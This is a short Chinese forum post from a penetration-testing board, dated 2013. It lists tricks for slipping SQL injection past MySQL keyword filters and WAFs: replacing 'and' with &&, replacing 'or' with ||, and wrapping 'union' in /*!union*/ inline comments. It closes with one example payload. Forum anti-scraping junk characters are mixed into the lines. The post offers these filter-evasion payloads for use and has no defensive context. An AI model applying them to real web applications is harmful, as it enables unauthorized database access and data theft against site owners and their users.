中国网络渗透测试联盟

标题: mysql注入对and or的过滤及uinon select等过滤的一个方法突破 [打印本页]
作者: admin    时间: 2013-2-23 12:41
标题: mysql注入对and or的过滤及uinon select等过滤的一个方法突破
1.and 用&& 代替+ |. W& N- R+ a# W( `7 ]
9 u$ [% w( X& T! c! p/ ^
2. or 用||代替# I. U. y# m) B. X$ [6 J3 H/ V
. Z' V7 I! f- D. \! N
3.union select from 变成 /*!union*/这种。% K- j# ?: }3 \( q2 \

! X: b2 t# l4 h/ _0 J) l7 r. ]$ k一个例子:
3 f4 f$ a/ @7 g% s: I; {* i" T& ~
2 x! M( X# X9 C/ select 1 /*!union*/ select 2 from adad where 1&&1& ?4 {; Z8 Y* P) Q

: F) V( C0 o/ q3 A( e# G7 i' U摘自 it_security
+ D8 t# a/ k. {, R  E' c; D( C  @( s
绕过waf的一个思路
. d$ l7 p  ~/ q6 ]" I$ }& o% F1 B; g8 m6 O  y  R& j, }




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2